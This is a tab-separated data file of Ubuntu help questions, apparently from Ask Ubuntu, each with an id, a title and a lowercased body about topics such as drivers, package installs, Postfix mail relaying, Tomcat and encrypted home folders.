-- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- max 7 p/s | 7 p/s average 1 p/s | 1 p/s min 0 p/s | 0 p/s -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- time 25 seconds
341218	how to open files and directories using a single click in lubuntu ?	is it possible to configure lubuntu so that i can open folders or run applications with a single click instead of a double-click ? thanks in advance .
341220	how to enable the menu bar and the status bar in ubuntu 13.04 ?	i have just installed 13.04 . however , the global menu when i select the files folder does not show the options like : edit , view etc . is there a way to enable this ? how can i enable the status-bar for the folders ? i want to see the number of files in a folder .
341221	broken dependencies error message when trying to download emerald-themes	i was downloading themes last night on synaptic and came across a package called emerald-themes . every time i try to download it , synaptic flags it as having broken dependencies . when i check the 'dependencies ' tab it says it needs emerald ( > =0.9.5 ) . i did a search in synaptic for emerald and i have version 0.9.5 . so why am i getting this message ?
341234	how to update sqlmap in ubuntu 12.04	how to update sqlmap in ubuntu 12.04 . it 's giving me problem . how do i do this ?
341239	how to remove unity-greeter with all additional packages ?	i 'm using xubuntu , i installed unity-greeter package via sudo apt-get install unity-greeter , it also installed a lot of other packages ( ex i noticed 'online accounts ' in settings ) . then i removed it with sudo apt-get remove unity-greeter but it removed only unity-greeter package . my question is , how do i remove all the crap installed along with unity-greeter package ? sudo apt-get autoremove does n't find anything to remove .
341241	ubuntu wo n't start with `` device descriptor read/64 , error -32 '' , what this message means ?	i am running ubuntu 12.04 on my computer . yesterday i tried to change the splash screen according to the instructions here here.then i installed gdm . after that i restarted the computer and the splash screen was changed . i enabled automatic login . then i restarted again and went into windows 7 and again came back to ubuntu . this time ubuntu was stuck up at a black screen with the following message : ubuntu 12.04 ... .*starting virtualbox kernel modules [ ok ] *stopping cold plug devices [ ok ] [ ok ] *stopping log initial device creation [ ok ] *starting configure network device security [ ok ] *starting save udev log and update rules [ ok ] *starting configure virtual network devices [ ok ] *stopping configure virtual network devices [ ok ] *stopping save udev log and update rules [ ok ] *starting network connection manager wicd *starting the winbind daemon winbind [ ok ] s aned disabled : edit /etc/default/saned [ ok ] s tarting hwactivator * [ done ] *starting timidity++alsa midi emulation ... [ ok ] [ 23.184121 ] usb 1-1.5 : device descriptor read/64 , error -32 [ 23.359845 ] usb 1-1.5 : device descriptor read/64 , error -32 i have reinstalled ubuntu now , but i just want to know what caused the problem .
341242	not able to connect bsnl evdo prithvi in ubuntu 13.04	i am not able to run bsnl prithvi evdo card in ubuntu 13.04 . can you please tell me how to fix this ? any help would be highly appreciated .
341254	pkexec can not start any gui application	i am running ubuntu 13.04 , gnome 3.6 . there is something amiss with pkexec that is not allowing it to start any gui application . pkexec synaptic in a zsh terminal produces a box asking for admin password . on entering the correct password , it shows : no protocol specified ** ( synaptic:6053 ) : warning ** : could not open x display no protocol specified ( synaptic:6053 ) : gtk-warning ** : can not open display : :0 the result is the same if i replace synaptic with nautilus or run synaptic-pkexec . from the same terminal , both the applications run correctly ( a box asking for a password followed by the application launching ) when launched as gksu nautilus or gksu synaptic however , pkexec ls / produces the box asking for password and on entering the password , it displays the listing in the terminal . the contents of /usr/share/polkit-1/actions/com.ubuntu.pkexec.synaptic.policy are : < ? xml version= '' 1.0 '' encoding= '' utf-8 '' ? > < ! doctype policyconfig public `` -//freedesktop//dtd policykit policy configuration 1.0//en '' `` http : //www.freedesktop.org/standards/policykit/1/policyconfig.dtd '' > < policyconfig > < action id= '' com.ubuntu.pkexec.synaptic '' > < message > authentication is required to run the synaptic package manager < /message > < message xml : lang= '' ru '' > для запуска менеджера пакетов synaptic требуется аутентификация < /message > < icon_name > synaptic < /icon_name > < defaults > < allow_any > auth_admin < /allow_any > < allow_inactive > auth_admin < /allow_inactive > < allow_active > auth_admin < /allow_active > < /defaults > < annotate key= '' org.freedesktop.policykit.exec.path '' > /usr/sbin/synaptic < /annotate > < annotate key= '' org.freedesktop.policykit.exec.allow_gui '' > true < /annotate > < /action > < /policyconfig > % what is happening ? how do i set it right ? also , a sad thing , a crucial piece of software like pkexec misbehaves !
341256	ubuntu is not detecting wireless router cisco dpc3825 . newbie to ubuntu , can connect via ethernet cable , but no wireless detection	i am unable to see any wireless networks detected . i installed ubuntu 12.04 alongside windows 8 on a lenovo g780 laptop two days ago . i can use the internet through an ethernet cable connected to my cisco dpc3825 wireless router , or through windows 8 wirelessly , but ubuntu is not detecting any wireless networks at all . updating the drivers is also not working . when i try to activate the broadcom sta wireless driver , i get the following output : sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log here are some of the other outputs : iwconfig shows the following : eth0 no wireless extensions . lo no wireless extensions . lxcbr0 no wireless extensions . rfkill list shows the following : 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no 2 : hci0 : bluetooth soft blocked : no hard blocked : no lspci shows the following : 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 635m ] ( rev a1 ) 02:00.0 ethernet controller : qualcomm atheros ar8162 fast ethernet ( rev 10 ) 03:00.0 network controller : broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 ) lshw -c network shows the following : *-network description : ethernet interface product : ar8162 fast ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 10 serial : b8:88 : e3:98:9d : fa size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx driverversion=1.2.3 duplex=full firmware=n/a ip=192.168.0.23 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:16 memory : d3900000-d393ffff ioport:2000 ( size=128 ) *-network unclaimed description : network controller product : bcm4313 802.11bgn wireless network adapter vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : d3800000-d3803fff if any other commands/info will be helpful , please let me know . thanks in advance .
341264	cuda is not working on ubuntu 12.04	i 'm planning to start some cuda development , so i 'm trying to use the nvidia card that i have installed and i have n't yet be able to use ( an nvidia corporation gf108m [ geforce gt 630m ] ) because ubuntu ( 12.05 64 bits ) seems to have many issues with it . what i did is download the cuda 5.5 installers and execute the following in that order : nvidia-linux-x86_64-319.37.run cuda-linux64-rel-5.5.22-16488124.run cuda-samples-linux-5.5.22-16488124.run to make the nvidia driver installation to work , i have to uninstall bumblebee first . the installer wanted to override xorg.conf but i choose not to because some previous disastrous installations ( i only get a black screen ) . i used this blog post instructions to validate my installation . i first executed this : cptanalatriste @ cptanalatriste-inspiron-5420 : /usr/local/cuda-5.5/lib64 $ cat /proc/driver/nvidia/version cat : /proc/driver/nvidia/version : no such file or directory and i get that error message . after compiling and executing the cuda samples . i 'm getting this : cptanalatriste @ cptanalatriste-inspiron-5420 : /usr/local/cuda-5.5/samples/1_utilities/devicequery $ sudo ./devicequery ./devicequery starting ... cuda device query ( runtime api ) version ( cudart static linking ) warning : not loading blacklisted module nvidia_304 fatal : module nvidia not found . cudagetdevicecount returned 38 - > no cuda-capable device is detected result = fail any ideas ? i suspect the driver installation did n't go that well .
341265	installation process	i want to install ubuntu 12.04 in hdd , there is no other operating system available in my hard disk.so will u please tell me , the complete process that how to make partition in the hard disk ... . the main problem is that what should type for the hard disk part and what should be the mount point for the each disk part ... my total hard disk space is 500 gb . and i want to make 3 part of it . part 1 : 75 gb : for make it syste drive part 2 : 200 gb : ntfs part 3 : 225 gb : ntfs and yeah in the disk type , there is no option like ntfs , so what other option shold i select for other partition ... .. waiting for the affirmative reply.. ! ! ! !
341269	installing on usb stick	i have the live system running from usb stick . ( 13.04 ) it boots straight into it so no issues there . however , when i go to install option and can choose another usb stick to install full system . the installation churns away concludes to it 's satisfaction but then wo n't boot . am i selecting thw wrong options somewhere or ca n't you install 13.04 on a stick ? tried all which ways to get it to boot from usb stick . brings back memories of when i first tried to get linux to work 20 years ago . it is still very unfriendly at the base level .
341271	how to troubleshoot tomcat7 on ubuntu server from cloudapp service ?	we have gotten a server from the client and are having trouble getting it to working . they gave us an ubuntu server ( 13.04 ) and some credentials to log in on it . the dns has cloudapp.net in its name and they said it was some microsoft service / azure stuff . when we got access to the machine over ssh we ran : sudo apt-get tomcat7 install then we installed lynx sudo apt-get lynx install then we ran lynx localhost:8080 we then got the tomcat everything is fine , page and up and running . but when we tried to access the page from the browser of another machine not connected to the ssh we did n't get a response . what do we do to troubleshoot this ? our goal is to get the server to host an external page . edit : that microsoft thing i keep talking about seems to be windows azure . he said port 80 public - port 08 private and port 8080 public and port 8080 private was linked . i got a request to add some information netstat -tulpn -- -- - : / $ netstat -tulpn ( no info could be read for `` -p '' : geteuid ( ) =1000 but you should be root . ) active internet connections ( only servers ) proto recv-q send-q local address foreign address state pid/program name tcp 0 0 100.85.242.22:16001 0.0.0.0 : * listen - tcp 0 0 0.0.0.0:22 0.0.0.0 : * listen - tcp6 0 0 127.0.0.1:8005 : : : * listen - tcp6 0 0 : ::8080 : : : * listen - tcp6 0 0 : ::22 : : : * listen - udp 0 0 0.0.0.0:68 0.0.0.0 : * - udp 0 0 0.0.0.0:48318 0.0.0.0 : * - udp6 0 0 : ::33698 : : : * - i was not able to get the formatting to be correct but a copy can be found : https : //gist.github.com/andersos/6460952
341272	is there an alternative to gnome-terminal ?	are there any terminals that can serve as an alternative to gnome-terminal . do these alternatives have other/extra features ?
341274	ubuntu 13.04 ati graphics card and opengl issues	problem i am trying to run an opengl application which has worked on previous releases of ubuntu on other machines but which happily opens windows crashes when i try and draw anything in them . system ubuntu 64 bit release : 13.04 cpu processor : 2 vendor_id : authenticamd cpu family : 16 model : 4 model name : amd phenom ( tm ) ii x4 b95 processor stepping : 2 microcode : 0x10000db cpu mhz : 800.000 cache size : 512 kb physical id : 0 siblings : 4 core id : 2 cpu cores : 4 apicid : 2 initial apicid : 2 fpu : yes fpu_exception : yes cpuid level : 5 wp : yes graphics 01:05.0 vga compatible controller : advanced micro devices [ amd ] nee ati rs880 [ radeon hd 4200 ] troubleshooting i downloaded globs and ran all the standard tests . they all worked properly except for glsl_paralax which failed to even start . i checked my graphics driver . glxinfo | grep render direct rendering : yes opengl renderer string : gallium 0.4 on amd rs880 gl_nv_conditional_render , gl_amd_conservative_depth , i understand this to mean that i am using the open source graphics driver and i am not using software rendering . i ran glxgears glxgears -info running synchronized to the vertical refresh . the framerate should be approximately the same as the monitor refresh rate . gl_renderer = gallium 0.4 on amd rs880 gl_version = 3.0 mesa 9.1.3 gl_vendor = x.org ... 301 frames in 5.0 seconds = 60.155 fps 299 frames in 5.0 seconds = 59.766 fps 298 frames in 5.0 seconds = 59.566 fps 300 frames in 5.0 seconds = 59.968 fps i think this is a bad result . other sources said that i should have a much higher framerate , though my monitor is set at 60 hz so if the render rate is set at that , it seems correct i checked the opengl error log cat /var/log/xorg.0.log | grep ee ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 14.665 ] initializing built-in extension mit-screen-saver [ 14.797 ] ( ee ) failed to load module `` fglrx '' ( module does not exist , 0 ) [ 14.832 ] ( ee ) failed to load module `` fglrx '' ( module does not exist , 0 ) i think this means that i do not have the fglrx installed i looked up what fglrx is and it appears that it is part of the proprietary opengl driver . instructions on how to install it are found here : http : //wiki.cchtml.com/index.php/ubuntu_raring_installation_guide # installing_proprietary_drivers_a.k.a._catalyst.2ffglrx questions does anyone have any insight as to why the glsl_paralax test failed to even start ? is there another comparable test i could try ? are there other diagnostic tests i could perform to isolate my problems ? is the missing fglrx module important ? could it be the source of my problems ? if so , can i get it without installing the proprietary driver ? if i need the proprietary driver , is the link i included the safest/easiest way to get it ? i am loath to follow their instructions as i have had problems manually configuring the graphics driver of other linux machines . is there a graphical tool like additional drivers which could be used instead ?
341275	for loop copy command	i have a file , filetocopy.pbs , that i would like to copy into multiple directories while changing a line called xxx in the file to the pwd location of the directory in which the file is to be copied . what kind of for loop can i use to make this command ? also , some of my directories include a * at the end of the directory path name . more specifically i have a directory structure : /home/path1/dir1 /home/path1/dir2 /home/path1/dir3* /home/path1/dir4* . . etc and would like to copy filetocopy.pbs into all directories so that i have : /home/path1/dir1/filetocopy.pbs /home/path1/dir2/filetocopy.pbs /home/path1/dir3*/filetocopy.pbs /home/path1/dir4*/filetocopy.pbs while changing a line xxx in each copied file of filetocopy.pbs to the directory in which it is in . for instance , the line xxx for the filetocopy.pbs located in /home/path1/dir1/ should be changed to /home/path1/dir1/ thank you .
341276	how to mount so spaces in filenames are replaced	i know that there are many ways to replace spaces in filenames with underscores by renaming the file . but what i am searching for is a way to access the untouched files with a different filename ( a little like ciopfs , but targeted at whitespace ) . an example would be ./my bad filename should show as ./my_bad_filename it would be ok for me if the solution is n't as general as mounting , but maybe uses samba . for the data that needs the fix , i 'm using an indirect samba mount anyway . thanks a lot !
341283	replacement for mplayer ?	i 'm looking for a replacement for mplayer . mplayer is a audio player for the console . it works just fine when i use it like so : mplayer /path/to/audio.mp3 but when i start it in the background i get this error message : : ~ $ mplayer /home/.alarm-sounds/alien1.wav & [ 3 ] 15451 : ~ $ mplayer svn r34540 ( ubuntu ) , built with gcc-4.7 ( c ) 2000-2012 mplayer team mplayer : could not connect to socket mplayer : no such file or directory failed to open lirc support . you will not be able to use your remote control . i 'm trying to write a little alarm script because i want to practice some modified version of pomodoro .
341284	how to install pstocanonij filter in cups for canon printer ( 12.04 64 bit ) ?	i 've been trying to install my canon mp620 printer to my new laptop for a couple of days now without joy . i 've tried every instruction i can find online and only one has come close to working : it finds the wireless printer and installs the driver ( canon mp620-630 bkintegration ver.4.0 universal ) , but i get a message in the printer status box that says : idle - file `` /usr/lib/cups/filter/pstocanonij '' not available : no such file or directory i 've looked in the folder and that file is missing . i 've found the file on my old laptop ( running 12.04 32bit and the same printer ) but because its a root permission only folder , i ca n't add it to the new one . i do n't know if adding it will solve the problem but can someone tell me how to do it ? cheers .
341288	can the admin of a ssh server monitor internet traffic ?	i use ssh tunnelling + socks4/5 to browse securely , but a certain question came up in my mind , can the administrator of that ssh server monitor my traffic ? like see which websites i am visiting , passwords..etc ? ( also , that ssh server runs on openssh 6.2p2 )
341290	using eth0 for network and eth1 for internet	hello there ubuntu users . as the question title states , i would like to know if eth0 can be used for local network , and eth1 used as nat internet ( if you use vbox for host-only servers , you 'll know why this needs to be done . ) in ubuntu server 12.04 ? i can access the network fine , but no internet . i have searched the google using multiple terms but all i get is people wanting to share connections . any help appreciated : )
341292	how to install graphic drivers for intel gm45	i recently installed ubuntu 12.04 lts on my dell laptop whose configuration is as follows : intel core 2 duo processor t6400 ; intel gma 4500 mhd graphics processor when i tried to launch a game `` call of duty '' using winetricks . an error is displayed saying install drivers for your graphic devices . please help me with this . thanks in advance .
341294	mountmanager only opens from command line not launcher	given : 3.2.0-53-generic # 81-ubuntu smp thu ... utc 2013 x86_64 x86_64 x86_64 gnu/linux i can no longer open mountmanager from the launcher . mm starts from the command line and functions normally but pauses as illustrated below . tried re-installing mountmanager as suggested in another forum session but it behaves the same . also the mountmanager.log does not record anything . this is no big deal but just curious if this may be symptomatic of a larger problem . ** 2 records in /etc/fstab were detected . [ g ] dbus interface was created [ g ] all devices were recieved [ i ] storage device was detected : `` /dev/sda6 '' [ i ] storage device was detected : `` /dev/sdb6 '' [ i ] storage device was detected : `` /dev/sr0 '' [ i ] storage device was detected : `` /dev/sda3 '' [ i ] storage device was detected : `` /dev/sdb3 '' [ i ] storage device was detected : `` /dev/sdb5 '' [ i ] storage device was detected : `` /dev/sdb2 '' [ i ] storage device was detected : `` /dev/sdb1 '' [ i ] storage device was detected : `` /dev/sda5 '' [ i ] storage device was detected : `` /dev/sda2 '' [ i ] storage device was detected : `` /dev/sda1 '' [ i ] storage device was detected : `` /dev/sdb '' [ i ] storage device was detected : `` /dev/sda '' [ g ] parsing of `` /usr/share/mountmanager/options/common.xml '' was successful [ g ] parsing of `` /usr/share/mountmanager/options/ntfs-3g.xml '' was successful [ w ] parsing of `` /usr/share/mountmanager/options/ext4.xml '' was unsuccsessful [ w ] parsing of `` /usr/share/mountmanager/options/iso9660.xml '' was unsuccsessful [ w ] parsing of `` /usr/share/mountmanager/options/udf.xml '' was unsuccsessful '' sni-qt/4947 '' warn 09:50:41.105 void statusnotifieritemfactory : :connecttosnw ( ) invalid interface to snw_service later discovered i was able to setup mountmanager via cairo-dock so the problem may be more with launcher than mm .
341295	install pandoc ( required for docverter )	for the life of me i ca n't figure out how to install pandoc . i tried the approach recommended on its github repo as well as all 3 approaches recommended on the pandoc site . i 'm installing on ubuntu 12.04 so i first did sudo apt-get install haskell-platform . here 's where the error occurred at each step : 1 ) installing as recommended on the github repo : # cabal install -- enable-tests registering zlib-conduit-1.0.0 ... cabal : error : some packages failed to install : http-conduit-1.9.4.5 depends on mime-types-0.1.0.3 which failed to install . mime-types-0.1.0.3 failed during the building phase . the exception was : exitfailure 9 pandoc-1.12 depends on mime-types-0.1.0.3 which failed to install . 2 ) primary installation method on pandoc site : # cabal install pandoc [ 35 of 45 ] compiling text.pandoc.parsing ( src/text/pandoc/parsing.hs , dist/build/text/pandoc/parsing.o ) cabal : error : some packages failed to install : pandoc-1.11.1 failed during the building phase . the exception was : exitfailure 9 3 ) `` if my distribution has ghc 6.12 '' # cabal install cabal-install [ 46 of 67 ] compiling distribution.simple.localbuildinfo ( distribution/simple/localbuildinfo.hs , dist/build/distribution/simple/localbuildinfo.o ) cabal : error : some packages failed to install : cabal-1.16.0.3 failed during the building phase . the exception was : exitfailure 9 cabal-install-1.16.0.2 depends on cabal-1.16.0.3 which failed to install . 4 ) installing the tarball : # cabal install pandoc [ 23 of 45 ] compiling text.pandoc.writers.texinfo ( src/text/pandoc/writers/texinfo.hs , dist/build/text/pandoc/writers/texinfo.o ) cabal : error : some packages failed to install : pandoc-1.11.1 failed during the building phase . the exception was : exitfailure 9
341299	how to use gamecaster to record minecraft ?	i have installed gamecaster on ubuntu 12.04 64-bit and would like to use it to record my minecraft window . how would i do this ?
341300	equivalent do dash in gnome-classic ?	i am using ubuntu 12.04 with gnome-classic ( no effects ) instead of unity . but i admit that the dash launcher is useful sometimes . is there an equivalent launcher that we could use with gnome-classic ?
341301	how to restart x window ( xorg ? ) when it 's dead	i found my x window is dead , all the graphic application have no reaction on the mouse click , so i have to change to the tty1 to work , use the ctrl+alt+f1 but the previous work is still need to rework . the command ps does n't display the xorg 's thread , so i could n't kill it . and when i need to go back to graphic window , i must reboot the system .
341302	mount old encrypted home	i 'm aware of this post , but my problem is slightly different . i have two partitions , one with my old ubuntu 10.04 , and one with my current ubuntu 12.04 . my old home is encrypted using ecryptfs , but i 'm unsure what password i used when i set it up ; the only thing i 'm sure of is that i know my previous login password , and that when i log in in my previous ubuntu , all my data is there . now i did n't forget that password , i 'm just not sure what it is and i 'd like to make a few `` trials '' , but i 'm not sure if i should begin with the sudo ecryptfs-add-passphrase -- fnek right away . my previous login password is different from my current one . ecryptfs-mount-private seems to run in the console , but no private folders shows up in my home then , and i do n't get any error message ( and no message at all for that matter ) . when i click on the access-your-private-data.desktop in my old home , i see a console window that opens and shuts down right away . finally ecryptfs-setup-private returns error : wrapped-passphrase file already exists , use -- force to overwrite . which means it 's already setup correctly i guess ? thanks in advance for your help ! edit : now that i think about it , i do n't need to have these encrypted actually , i guess i just wanted to try out a nice feature of ubuntu in my previous distro . since i 'm still able to login there , i do n't mind `` disabling '' the encryption altogether if it 's simpler than getting this pb fixed : )
341305	ca n't boot windows partition	what i have ? 500gb harddrive - 500gb for windows 1000gb harddrive - 500gb for ubuntu - 500gb for extra storage problem description i am unable to boot my computer except by usb at the moment . so i booted into ubuntu via usb , and tried to see if i could mount my ubuntu partition . however , everytime i tried , it would say unrecognized file system . i 've been searching all over online trying to figure out how to get my computer working but made no progress so if you could help , i would greatly appreciate that . thanks !
341308	how to find the lastest source code for `` unzip '' ?	i have version 6.0-4ubuntu1 installed , but here ftp : //ftp.info-zip.org/pub/infozip/src/ i see only version 6.0 .
341313	move home folder back on to ssd	my current setup at the moment is i have my system partition on my ssd , and my home folder on a 320gb hdd . the hdd is unfortunately beginning to die with a couple bad sectors coming up , so i 'd like to move my home folder on to my ssd . what is the best approach for this ? thanks !
341316	ubuntu installed in windows but want to format windows	what will happen to the ubuntu in this situation ? the windows is windows 7 . thank you .
341317	which version of ubuntu is suitable for my intel atom n2600 processor ?	i have a laptop , its configuration is as follows : processor : intel atom n2600 ( 1.6 ghz , 1 mb cache ) memory : 1 gb hdd : 320 gb which version of ubuntu is suitable for this pc ?
341323	supr , and 3 arrows keys not working in ubuntu 12.04	well , my arrows ( up , left , down ) and my supr ( or del ) key are not working.. i tried with sudo dpkg-reconfigure keyboard-configuration with a few different keybords , and changing system settings about the keyboard but nothing happens . i keep getting this image with and x every time i use these keys ( in chrome , firefox , terminal , etc ) . the arrows are working well with `` fn '' . and they were working yesterday as arrows .
341324	when logging in directly to an application , will the transmission-daemon run in the background ?	i have a media computer running ubuntu 12.04 and xbmc . i also have flexget and transmission-deamon set up to run automatically every hour with a line in my crontab . @ hourly /usr/local/bin/flexget -- cron question is , i open xbmc on this machine by selecting 'xbmc ' instead of 'ubuntu ' at the log in screen . will my flexget and the transmission-daemon still run in the background ?
341327	not using network-manager and modem-manager	what is the best way to prevent network-manager ( and modem-manager for that matter ) from starting ?
341336	how to upgrade ubuntu12.04 to ubuntu 13.04	how to upgrade ubuntu 12.04 to 13.04 . what is the difference of these versions . after ending the support of 13.04 what we have to do ?
341337	clock in panel not keeping correct time	i 'm running kubuntu 13.04 , this issue started recently , not sure exactly when though , and seems strange . the digital clock in the panel sets itself ahead 4 hours , each reboot after resetting , it sets itself ahead again . i went through suggestions , others have with the same problem , from different forums . if i remove the digital clock from the panel and add a desktop digital clock widget , set the time and timezone , on each reboot it keeps correct time , if i add a digital clock to the panel , it starts to jump the time forwards on each reboot . any ideas as to why the desktop clock would work correctly and the panel clock not ?
341340	libreoffice autorecovery info lost when losing power ?	i had my laptop spinning accidentally until the laptop died . i have the `` save autorecovery information every '' checked and set to 15 minutes ( default ? ) . however , when the recovery took place none of the edits ( after last save ) that i made yesterday went into the recovered document . is there some logs that i can check to see what has actually happened here ? since this is a misbehaviour on when losing power to a machine , maybe there 's a bug already tracking this ?
341350	how to remove gnome theme completely from ubuntu 13.04	i installed gnome desktop theme from software center last week . but since i used it and i am having some problem with my keyboard . i tried to remove it from software center but i can still see the gnome apps and gnome theme at my login screen . so i want to remove it completely . please help . this is the screenshot of what i installed .
341354	portable ubuntu external drive ? please help	i want to create an external ubuntu harddrive but i want to know that is there any way to install it without adding changes to the boot option menu . i currently have windows 7 installed on my pc but i do n't want a choosing menu ( win7/ubuntu ) each time my pc starts , i want it to be like a plug and play device . is it possible please reply in steps !
341355	why does n't ubuntu touch support multiple users ?	why ca n't ubuntu mobile os support multiple users just like the desktop edition , capability of creating multiple user accounts . what is it that ubuntu desktop os support multiple accounts and not in ubuntu mobile os ? i know the one is meant for a mobile devices and the other desktop pc ? so in general whats the difference between two ? thanks very much .
341356	can i make a 'virtualbox ' guest os see and use directories and files from the host os ?	i was researching it and read somewhere that you can , but that was ages ago and i ca n't find it now so here i am on here .
341357	where are application files stored ?	i have installed few software in ubuntu . some of these software are quite big and needs more than 400mb of space during installation . in windows , when we install a software , it is saved in program files , where we can see all the files . what is the path of the equivalent location for ubuntu ? i mean , in which path , i can see that , there is a folder for that particular application and entering that , i can see all 400mb+ data .
341360	moving pictures	i downloaded pictures from my phone to computer . all the pictures are now on shotwell photo manger how do i get them so i can see them from my home folder . i tried right clicking to move it into home folder but it doesnât work .
341363	send all local mail to a single external e-mail	i am trying to send all local mail to a single external e-mail , using google 's smtp servers ( i got that working following this nice tutorial ) . using google 's smtp servers work , as i am able to send mail to external addresses work using mail from mailutils . the redirection of local mail to the external e-mail does not work . when sending a mail to root from my account test using : echo `` body '' | mail -s `` test postfix to root '' root i never recieve the message nothing new turns up in /var/log/mail.err this turns up in /var/log/mail.log sep 4 18:48:06 desktop1204test postfix/pickup [ 5535 ] : c9326ee26 : uid=1000 from= sep 4 18:48:06 desktop1204test postfix/cleanup [ 5702 ] : c9326ee26 : message-id= sep 4 18:48:06 desktop1204test postfix/qmgr [ 5534 ] : c9326ee26 : from= , size=401 , nrcpt=1 ( queue active ) sep 4 18:48:06 desktop1204test postfix/local [ 5704 ] : c9326ee26 : to= , orig_to= , relay=local , delay=0.03 , delays=0.02/0/0/0 , dsn=2.0.0 , status=sent ( delivered to mailbox ) sep 4 18:48:06 desktop1204test postfix/qmgr [ 5534 ] : c9326ee26 : removed my /etc/postfix/main.cf : inet_interfaces = loopback-only mynetworks = loopback-only alias_maps = hash : /etc/aliases alias_database = hash : /etc/aliases # # i commented the below two lines out , as they conflicted with the accepted answer # # # # virtual_alias_domains = localhost.localdomain # # # # virtual_alias_maps = hash : /etc/postfix/virtual relayhost = [ smtp.gmail.com ] :587 smtp_sasl_auth_enable = yes smtp_sasl_password_maps = hash : /etc/postfix/sasl_passwd smtp_sasl_security_options = noanonymous smtp_tls_cafile = /etc/postfix/cacert.pem smtp_use_tls = yes my etc/aliases : # see man 5 aliases for format postmaster : root my /etc/postfix/virtual : @ localhost.localdomin someone @ somewhere.com how can i get it working ? i do n't want any local mail to arrive locally , they should all go to someone @ somewhere.com .
341366	ubuntu dell studio 1537	i have been trying to install ubunto 13.04 64bit onto my dell studio 1537 . i downloaded the iso , and burned it to a disk , and then i inserted the disk into the dell studio . i went into the boot menu and booted from disk ... afterwards all that showed up on the screen was the good old _ mark . then the laptop continued to boot itself back into windows 7 . i have been doing small bits of research and have found out that the dell studio 1537 should be able to run 64bit versions of os's/ distributions . any thoughts on what i could be doing wrong ? should i just try and boot the 32bit version instead ? idk ? if anyone could help it would be much appreciated . i am a windows user and i want to get into using linux so i am starting out with the desktop version until i can learn a little more .
341367	measuring load - % cpu in top is different than % us on server running tomcat	when i run top on a remote server , i see a very small system utilization ( 3.8 % us ) . however , for the actual process i am seeing 29.6 % of the cpu . since this server has 8 cpu cores , is the % cpu the utilization of only 1 cpu , while the us up top is over the 8 cpus ? when i divide 29.6 by 8 , i get 3.7 which looks to validate my guess . so questions : the low utilization i am seeing is actually over 8 cpus while the % cpu is for the cpu the process is using ? what happens for processes that are utilizing more than one cpu ? does tomcat use more than one cpu if required ? or will tomcat crash if the load is increased but we will never be informed of high load top output top - 12:17:40 up 9 days , 21:51 , 2 users , load average : 0.32 , 0.28 , 0.27 tasks : 201 total , 2 running , 199 sleeping , 0 stopped , 0 zombie cpu ( s ) : 3.8 % us , 0.1 % sy , 0.0 % ni , 96.1 % id , 0.0 % wa , 0.0 % hi , 0.0 % si , 0.0 % st mem : 16229072k total , 5617572k used , 10611500k free , 156480k buffers swap : 8388588k total , 0k used , 8388588k free , 2632452k cached pid user pr ni virt res shr s % cpu % mem time+ command 32676 tomcat 20 0 12.4g 2.3g 10m s 29.6 14.6 2530:56 java i have checked sources such as http : //www.kernelhardware.org/linux-top-command/ , but not one of them makes the distinction between % us and % cpu . only some ambiguous information such as : % cpu â percentage of cpu used
341372	install server 13.04 with raid1 ( +encrypted partitions ) failed	i am trying to install 13.04 server with raid1 + full disk encryption . i didnt manage to , so i reduced the to setup only to raid1 . however i still didnt manage to . i receive to following message : unable to install busybox-initramfs unfortunatly i could have found any soulution in google that would help . what could i have done wrong ? my partitioning looks like this : disk1/2 ( 3tb ata wdc ... ) 1mb free ( dont know why was created , probably due to gpt partition table ) 500mb raid1 /boot 8gb swap ( no raid ) 300gb raid1 / 2.7tb raid1 /home
341373	how to delete folder from ubuntu one ?	i have problem with deleting a folder from ubuntu one . i have stopped sync the folder on all of my computers connected to ubuntu-one . but the folder all the time is in the cloud , and it 's taking a lot of space . i 've even erased it from disk , but it did n't help . moreover , there is no `` delete folder '' button on the website ( to clarify : this is not a `` ubuntu one '' folder ) .
341375	hp printer wo n't print	i just attached a hp deskjet 3510 printer to my ubuntu 12.04 computer via usb , which works with other devices . the printer is not recognized by hplip , as the device manager says `` no installed hp devices found . '' when i try to print a test page from the print icon properties , nothing prints although the printer state says `` idle - rendering completed . '' however , a self-test page is printed ok directly from the printer itself . any suggestions please ?
